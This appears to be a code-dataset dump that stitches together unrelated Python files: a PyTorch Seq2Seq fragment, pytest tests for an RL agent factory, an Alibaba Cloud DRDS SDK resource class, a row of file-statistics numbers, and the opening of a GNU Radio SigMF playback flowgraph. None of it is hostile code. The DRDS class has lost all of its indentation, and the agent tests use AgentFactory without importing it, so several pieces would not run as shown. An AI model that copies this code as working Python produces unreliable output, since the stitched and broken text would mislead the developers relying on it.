model = Seq2Seq(enc, dec, SRC_PAD_IDX, TRG_PAD_IDX, device).to(
device
)
out, attention = model(x, trg[:, :])
print(out.shape)
print(attention.shape)
'''

# ---- tests/test_import.py (repo: eager-dev/eagerx_template, license: Apache-2.0) ----
def test_import():
    import eagerx_template

# ---- tests/agents/test_agent_factory.py (repo: LuisFMCuriel/ai-traineree, license: Apache-2.0) ----
import pytest
from ai_traineree.agents.ddpg import DDPGAgent
from ai_traineree.agents.dqn import DQNAgent
from ai_traineree.agents.ppo import PPOAgent
from ai_traineree.agents.sac import SACAgent
from ai_traineree.types.dataspace import DataSpace
from ai_traineree.types.state import AgentState

def test_agent_factory_agent_from_state_wrong_state():
    # Assign
    state = AgentState(
        model="WrongModel",
        obs_space=4,
        action_space=4,
        config={},
        network=None,
        buffer=None,
    )

    with pytest.raises(ValueError):
        AgentFactory.from_state(state)

def test_agent_factory_dqn_agent_from_state_network_buffer_none():
    # Assign
    obs_space = DataSpace(shape=(5,), dtype="float", low=0, high=2)
    action_space = DataSpace(shape=(1,), dtype="int", low=0, high=5)
    agent = DQNAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()
    state.network = None
    state.buffer = None

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent.model == DQNAgent.model
    assert new_agent.hparams == agent.hparams

def test_agent_factory_dqn_agent_from_state():
    # Assign
    obs_space = DataSpace(shape=(10,), dtype="float")
    action_space = DataSpace(shape=(1,), dtype="int", low=1, high=5)
    agent = DQNAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent == agent
    assert new_agent.model == DQNAgent.model
    assert new_agent.hparams == agent.hparams
    assert new_agent.buffer == agent.buffer

def test_agent_factory_ppo_agent_from_state():
    # Assign
    obs_space = DataSpace(dtype="float", shape=(10,))
    action_space = DataSpace(dtype="float", shape=(5,))
    agent = PPOAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent == agent
    assert new_agent.model == PPOAgent.model
    assert new_agent.hparams == agent.hparams
    assert new_agent.buffer == agent.buffer

def test_agent_factory_ppo_agent_from_state_network_buffer_none():
    # Assign
    obs_space = DataSpace(dtype="float", shape=(10,))
    action_space = DataSpace(dtype="float", shape=(5,))
    agent = PPOAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()
    state.network = None
    state.buffer = None

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent.model == PPOAgent.model
    assert new_agent.hparams == agent.hparams

def test_agent_factory_ddpg_agent_from_state():
    # Assign
    obs_space = DataSpace(dtype="float", shape=(4,))
    action_space = DataSpace(dtype="float", shape=(4,))
    agent = DDPGAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent.model == DDPGAgent.model
    assert new_agent == agent
    assert new_agent.hparams == agent.hparams
    assert new_agent.buffer == agent.buffer

def test_agent_factory_ddpg_agent_from_state_network_buffer_none():
    # Assign
    obs_space = DataSpace(dtype="float", shape=(4,))
    action_space = DataSpace(dtype="float", shape=(4,))
    agent = DDPGAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()
    state.network = None
    state.buffer = None

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent.model == DDPGAgent.model
    assert new_agent.hparams == agent.hparams

def test_agent_factory_sac_agent_from_state():
    # Assign
    obs_space = DataSpace(dtype="float", shape=(10,))
    action_space = DataSpace(dtype="float", shape=(5,))
    agent = SACAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent == agent
    assert new_agent.model == SACAgent.model
    assert new_agent.hparams == agent.hparams
    assert new_agent.buffer == agent.buffer

def test_agent_factory_sac_agent_from_state_network_buffer_none():
    # Assign
    obs_space = DataSpace(dtype="float", shape=(10,))
    action_space = DataSpace(dtype="float", shape=(5,))
    agent = SACAgent(obs_space, action_space, device="cpu")
    state = agent.get_state()
    state.network = None
    state.buffer = None

    # Act
    new_agent = AgentFactory.from_state(state)

    # Assert
    assert id(new_agent) != id(agent)
    assert new_agent.model == SACAgent.model
    assert new_agent.hparams == agent.hparams

# ---- debug.py (repo: fiorin7/xml-to-teilex, license: MIT) ----
from os import environ

def debug():
    return True if environ.get('TRANSFORM_DEBUG') else False

# ---- alibabacloud/services/_drds.py (repo: wallisyan/alibabacloud-python-sdk-v2, license: Apache-2.0) ----
# Copyright 2019 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from alibabacloud.resources.base import ServiceResource
from alibabacloud.resources.collection import _create_special_resource_collection
from alibabacloud.utils.utils import _new_get_key_in_response, _transfer_params
class _DRDSResource(ServiceResource):
def __init__(self, _client=None):
ServiceResource.__init__(self, 'drds', _client=_client)
self.regions = _create_special_resource_collection(
_DRDSRegionResource, _client, _client.describe_drds_regions,
'Regions.Region', 'RegionId',
)
def create_drds_db_pre_check(self, **params):
_params = _transfer_params(params)
response = self._client.create_drds_db_pre_check(**_params)
task_id = _new_get_key_in_response(response, 'TaskId')
return _DRDSDBPreCheckResource(task_id, _client=self._client)
def create_instance_internet_address(self, **params):
_params = _transfer_params(params)
self._client.create_instance_internet_address(**_params)
instance_internet_address_name = _params.get("instance_internet_address_name")
return _DRDSInstanceInternetAddressResource(instance_internet_address_name,
_client=self._client)
class _DRDSDBPreCheckResource(ServiceResource):
def __init__(self, task_id, _client=None):
ServiceResource.__init__(self, "drds.db_pre_check", _client=_client)
self.task_id = task_id
class _DRDSInstanceInternetAddressResource(ServiceResource):
def __init__(self, instance_internet_address_name, _client=None):
ServiceResource.__init__(self, "drds.instance_internet_address", _client=_client)
self.instance_internet_address_name = instance_internet_address_name
def change_account_password(self, **params):
_params = _transfer_params(params)
return self._client.change_account_password(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def change_instance_azone(self, **params):
_params = _transfer_params(params)
return self._client.change_instance_azone(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def change_instance_network(self, **params):
_params = _transfer_params(params)
return self._client.change_instance_network(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_capacity_data_ready(self, **params):
_params = _transfer_params(params)
return self._client.check_capacity_data_ready(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_db_name(self, **params):
_params = _transfer_params(params)
return self._client.check_drds_db_name(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_expand_status(self, **params):
_params = _transfer_params(params)
return self._client.check_expand_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_rds_expand_status(self, **params):
_params = _transfer_params(params)
return self._client.check_rds_expand_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_rds_super_account(self, **params):
_params = _transfer_params(params)
return self._client.check_rds_super_account(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def check_sql_audit_enable_status(self, **params):
_params = _transfer_params(params)
return self._client.check_sql_audit_enable_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def configure_db_instances(self, **params):
_params = _transfer_params(params)
return self._client.configure_drds_db_instances(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_db(self, **params):
_params = _transfer_params(params)
return self._client.create_drds_db(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_db_preview(self, **params):
_params = _transfer_params(params)
return self._client.create_drds_db_preview(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_instance_account(self, **params):
_params = _transfer_params(params)
return self._client.create_instance_account(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def create_shard_task(self, **params):
_params = _transfer_params(params)
return self._client.create_shard_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def datalink_replication_precheck(self, **params):
_params = _transfer_params(params)
return self._client.datalink_replication_precheck(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def delete_shard_tasks(self, **params):
_params = _transfer_params(params)
return self._client.delete_shard_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_back_menu(self, **params):
_params = _transfer_params(params)
return self._client.describe_back_menu(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_local(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_local(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_policy(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_policy(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_sets(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_sets(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_backup_times(self, **params):
_params = _transfer_params(params)
return self._client.describe_backup_times(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_broadcast_tables(self, **params):
_params = _transfer_params(params)
return self._client.describe_broadcast_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_can_expand_instance_detail_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_can_expand_instance_detail_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_candidate_instance_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_candidate_instance_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_cluster(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_cluster(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_ip_white_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_ip_white_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_instance(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_instance_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_db_instance_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_instances(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_instances(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_rds_name_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_rds_name_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_rds_relation_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_rds_relation_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_relation_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_relation_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_db_tasks(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_db_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_expand_logic_table_info_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_expand_logic_table_info_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_global_broadcast_type(self, **params):
_params = _transfer_params(params)
return self._client.describe_global_broadcast_type(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_hi_store_instance_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_hi_store_instance_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_hot_db_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_hot_db_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_inst_db_log_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_inst_db_log_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_inst_db_sls_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_inst_db_sls_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_accounts(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_accounts(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_db_monitor(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_db_monitor(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_level_tasks(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_level_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_menu_switch(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_menu_switch(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_monitor(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_monitor(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_switch_azone(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_switch_azone(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_switch_network(self, **params):
_params = _transfer_params(params)
return self._client.describe_instance_switch_network(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_instance_version(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_instance_version(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_params(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_params(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_pre_check_result(self, **params):
_params = _transfer_params(params)
return self._client.describe_pre_check_result(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_performance(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_performance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_commodity(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_commodity(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_performance_summary(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_performance_summary(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_rds_super_account_instances(self, **params):
_params = _transfer_params(params)
return self._client.describe_rds_super_account_instances(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_recycle_bin_status(self, **params):
_params = _transfer_params(params)
return self._client.describe_recycle_bin_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_recycle_bin_tables(self, **params):
_params = _transfer_params(params)
return self._client.describe_recycle_bin_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_restore_order(self, **params):
_params = _transfer_params(params)
return self._client.describe_restore_order(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_shard_task_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_shard_task_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_shard_task_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_shard_task_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_sharding_dbs(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_sharding_dbs(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_slow_sqls(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_slow_sqls(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_sql_audit_status(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_sql_audit_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_sql_flashbak_task(self, **params):
_params = _transfer_params(params)
return self._client.describe_sql_flashbak_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_src_rds_list(self, **params):
_params = _transfer_params(params)
return self._client.describe_src_rds_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_storage_instance_sub_db_info(self, **params):
_params = _transfer_params(params)
return self._client.describe_storage_instance_sub_db_info(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_table(self, **params):
_params = _transfer_params(params)
return self._client.describe_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_table_list_by_type(self, **params):
_params = _transfer_params(params)
return self._client.describe_table_list_by_type(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_tables(self, **params):
_params = _transfer_params(params)
return self._client.describe_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def describe_tasks(self, **params):
_params = _transfer_params(params)
return self._client.describe_drds_tasks(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def disable_sql_audit(self, **params):
_params = _transfer_params(params)
return self._client.disable_sql_audit(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def enable_instance_ipv6_address(self, **params):
_params = _transfer_params(params)
return self._client.enable_instance_ipv6_address(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def enable_sql_audit(self, **params):
_params = _transfer_params(params)
return self._client.enable_sql_audit(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def enable_sql_flashback_match_switch(self, **params):
_params = _transfer_params(params)
return self._client.enable_sql_flashback_match_switch(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def flashback_recycle_bin_table(self, **params):
_params = _transfer_params(params)
return self._client.flashback_recycle_bin_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def get_candidate_instance_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_candidate_instance_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_expand_logic_table_info_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_expand_logic_table_info_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_hot_db_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_hot_db_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_logic_table_info_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_logic_table_info_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def get_src_rds_list(self, **params):
_params = _transfer_params(params)
response = self._client.get_src_rds_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
return response
def modify_account_description(self, **params):
_params = _transfer_params(params)
return self._client.modify_account_description(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_account_privilege(self, **params):
_params = _transfer_params(params)
return self._client.modify_account_privilege(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_instance_description(self, **params):
_params = _transfer_params(params)
return self._client.modify_drds_instance_description(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_ip_white_list(self, **params):
_params = _transfer_params(params)
return self._client.modify_drds_ip_white_list(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_polar_db_read_weight(self, **params):
_params = _transfer_params(params)
return self._client.modify_polar_db_read_weight(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def modify_rds_read_weight(self, **params):
_params = _transfer_params(params)
return self._client.modify_rds_read_weight(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def pre_check_create_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.pre_check_create_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def pre_check_sql_flashback_task(self, **params):
_params = _transfer_params(params)
return self._client.pre_check_sql_flashback_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def put_restore_pre_check(self, **params):
_params = _transfer_params(params)
return self._client.put_restore_pre_check(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def put_start_backup(self, **params):
_params = _transfer_params(params)
return self._client.put_start_backup(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def rearrange_db_to_instance(self, **params):
_params = _transfer_params(params)
return self._client.rearrange_db_to_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def refresh_atom_url(self, **params):
_params = _transfer_params(params)
return self._client.refresh_drds_atom_url(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def refresh_jst_migrate_db_atom_url(self, **params):
_params = _transfer_params(params)
return self._client.refresh_jst_migrate_drds_db_atom_url(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def release(self, **params):
_params = _transfer_params(params)
return self._client.release_instance_internet_address(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def release_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.release_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_backups_set(self, **params):
_params = _transfer_params(params)
return self._client.remove_backups_set(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_db(self, **params):
_params = _transfer_params(params)
return self._client.remove_drds_db(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_db_failed_record(self, **params):
_params = _transfer_params(params)
return self._client.remove_drds_db_failed_record(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_instance(self, **params):
_params = _transfer_params(params)
return self._client.remove_drds_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_instance_account(self, **params):
_params = _transfer_params(params)
return self._client.remove_instance_account(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def remove_recycle_bin_table(self, **params):
_params = _transfer_params(params)
return self._client.remove_recycle_bin_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def reset_to_rds_connections(self, **params):
_params = _transfer_params(params)
return self._client.reset_drds_to_rds_connections(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def restart_instance(self, **params):
_params = _transfer_params(params)
return self._client.restart_drds_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def rollback_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.rollback_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def rollback_instance_version(self, **params):
_params = _transfer_params(params)
return self._client.rollback_instance_version(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def set_backup_local(self, **params):
_params = _transfer_params(params)
return self._client.set_backup_local(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def set_backup_policy(self, **params):
_params = _transfer_params(params)
return self._client.set_backup_policy(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_broadcast_tables(self, **params):
_params = _transfer_params(params)
return self._client.setup_broadcast_tables(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_params(self, **params):
_params = _transfer_params(params)
return self._client.setup_drds_params(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_recycle_bin_status(self, **params):
_params = _transfer_params(params)
return self._client.setup_recycle_bin_status(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def setup_table(self, **params):
_params = _transfer_params(params)
return self._client.setup_table(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def start_restore(self, **params):
_params = _transfer_params(params)
return self._client.start_restore(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_clean_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_clean_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_hot_expand_pre_check_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_hot_expand_pre_check_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_hot_expand_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_hot_expand_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_rollback_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_rollback_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_smooth_expand_pre_check(self, **params):
_params = _transfer_params(params)
return self._client.submit_smooth_expand_pre_check(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_smooth_expand_pre_check_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_smooth_expand_pre_check_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_smooth_expand_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_smooth_expand_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_sql_flashback_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_sql_flashback_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def submit_switch_task(self, **params):
_params = _transfer_params(params)
return self._client.submit_switch_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def switch_global_broadcast_type(self, **params):
_params = _transfer_params(params)
return self._client.switch_global_broadcast_type(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def update_instance_network(self, **params):
_params = _transfer_params(params)
return self._client.update_instance_network(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def upgrade_hi_store_instance(self, **params):
_params = _transfer_params(params)
return self._client.upgrade_hi_store_instance(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def upgrade_instance_version(self, **params):
_params = _transfer_params(params)
return self._client.upgrade_instance_version(
instance_internet_address_name=self.instance_internet_address_name, **_params)
def validate_shard_task(self, **params):
_params = _transfer_params(params)
return self._client.validate_shard_task(
instance_internet_address_name=self.instance_internet_address_name, **_params)
class _DRDSRegionResource(ServiceResource):
def __init__(self, region_id, _client=None):
ServiceResource.__init__(self, "drds.region", _client=_client)
self.region_id = region_id
self.region_endpoint = None
self.region_name = None
| 46.870423 | 90 | 0.743584 | 3,839 | 33,278 | 5.859859 | 0.056786 | 0.189189 | 0.271959 | 0.314456 | 0.900649 | 0.883624 | 0.875978 | 0.870288 | 0.869932 | 0.858108 | 0 | 0.000367 | 0.181201 | 33,278 | 709 | 91 | 46.93653 | 0.825235 | 0.017279 | 0 | 0.476449 | 0 | 0 | 0.003671 | 0.001835 | 0 | 0 | 0 | 0 | 0 | 1 | 0.242754 | false | 0.003623 | 0.005435 | 0 | 0.490942 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
fa245654f338db7b5e2020764a59d223084a8c54 | 90,116 | py | Python | gr37/kerberos/kerberos_sigmf_playback3.py | zleffke/flowgraph_sandbox | 6bcad45fd4585e917678b843be323278ebf06323 | [
"MIT"
] | null | null | null | gr37/kerberos/kerberos_sigmf_playback3.py | zleffke/flowgraph_sandbox | 6bcad45fd4585e917678b843be323278ebf06323 | [
"MIT"
] | null | null | null | gr37/kerberos/kerberos_sigmf_playback3.py | zleffke/flowgraph_sandbox | 6bcad45fd4585e917678b843be323278ebf06323 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Kerberos Sigmf Playback3
# GNU Radio version: 3.7.13.4
##################################################
if __name__ == '__main__':
import ctypes
import sys
if sys.platform.startswith('linux'):
try:
x11 = ctypes.cdll.LoadLibrary('libX11.so')
x11.XInitThreads()
except:
print "Warning: failed to XInitThreads()"
from PyQt4 import Qt
from PyQt4.QtCore import QObject, pyqtSlot
from gnuradio import analog
from gnuradio import blocks
from gnuradio import eng_notation
from gnuradio import fft
from gnuradio import filter
from gnuradio import gr
from gnuradio import qtgui
from gnuradio.eng_option import eng_option
from gnuradio.fft import window
from gnuradio.filter import firdes
from optparse import OptionParser
import adsb
import gr_sigmf
import pyqt
import sip
import sys
from gnuradio import qtgui
class kerberos_sigmf_playback3(gr.top_block, Qt.QWidget):
def __init__(self):
gr.top_block.__init__(self, "Kerberos Sigmf Playback3")
Qt.QWidget.__init__(self)
self.setWindowTitle("Kerberos Sigmf Playback3")
qtgui.util.check_set_qss()
try:
self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))
except:
pass
self.top_scroll_layout = Qt.QVBoxLayout()
self.setLayout(self.top_scroll_layout)
self.top_scroll = Qt.QScrollArea()
self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)
self.top_scroll_layout.addWidget(self.top_scroll)
self.top_scroll.setWidgetResizable(True)
self.top_widget = Qt.QWidget()
self.top_scroll.setWidget(self.top_widget)
self.top_layout = Qt.QVBoxLayout(self.top_widget)
self.top_grid_layout = Qt.QGridLayout()
self.top_layout.addLayout(self.top_grid_layout)
self.settings = Qt.QSettings("GNU Radio", "kerberos_sigmf_playback3")
self.restoreGeometry(self.settings.value("geometry").toByteArray())
##################################################
# Variables
##################################################
self.trig_delay = trig_delay = 0.001
self.trig_channel = trig_channel = 0
self.throttle = throttle = 2
self.thresh = thresh = 50
self.samp_rate = samp_rate = 2e6
self.nfft = nfft = 8192
self.delay_3 = delay_3 = 1788
self.delay_2 = delay_2 = 5261
self.delay_1 = delay_1 = 734
self.delay_0 = delay_0 = 0
self.corr_alpha_0_3 = corr_alpha_0_3 = 0.01
self.corr_alpha_0_2 = corr_alpha_0_2 = 0.01
self.corr_alpha_0_1 = corr_alpha_0_1 = 0.01
##################################################
# Blocks
##################################################
self.main_tab = Qt.QTabWidget()
self.main_tab_widget_0 = Qt.QWidget()
self.main_tab_layout_0 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_0)
self.main_tab_grid_layout_0 = Qt.QGridLayout()
self.main_tab_layout_0.addLayout(self.main_tab_grid_layout_0)
self.main_tab.addTab(self.main_tab_widget_0, 'Channel')
self.main_tab_widget_1 = Qt.QWidget()
self.main_tab_layout_1 = Qt.QBoxLayout(Qt.QBoxLayout.TopToBottom, self.main_tab_widget_1)
self.main_tab_grid_layout_1 = Qt.QGridLayout()
